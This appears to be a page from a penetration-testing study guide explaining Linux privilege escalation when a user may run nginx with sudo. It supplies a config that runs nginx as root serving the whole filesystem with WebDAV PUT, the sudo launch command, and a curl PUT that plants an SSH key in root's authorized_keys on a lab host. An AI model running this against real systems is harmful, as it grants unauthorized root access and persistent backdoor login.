> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/linux-privilege-escalation/nginx.md).

# Nginx

Having sudo access to **/usr/sbin/nginx** we can web server as **root** as access the filesystem (read and write) using root privileges.

<figure><img src="/files/wwcKFFUCBEguLDu3eoQu" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Change the user in the nginx.conf file to root
{% endhint %}

<figure><img src="/files/4sDwDMHPKqedC8JcdiDG" alt=""><figcaption></figcaption></figure>

```bash
cat nginx.conf | grep -v '\#'|grep . > /tmp/nginx.conf
```

New nginx.conf file

```
user root;
worker_processes auto;
events {
	worker_connections 768;
}
http {
server {
	listen	1338;
	server_name	localhost;
	root /;
	dav_methods PUT;
	autoindex on;

	}
}
```

* user will  be root
* the server will listen on 1338
* the directory will be /
* dav\_methods allows us to use the PUT method to update files
* autoindex allows up to browse the filesystem

```bash
sudo /usr/sbin/nginx -c /tmp/nginx.conf
```

Visit http\://\<IP>:1338 and view filesystem using the root user

<figure><img src="/files/OHMV8xiiMKaB8IwpH7OE" alt=""><figcaption></figcaption></figure>

Create add a new public key to roots authorized\_keys file

```
ssh-keygen
curl -X PUT http://10.10.11.243:1338/root/.ssh/authorized_keys -d 'public key'
```
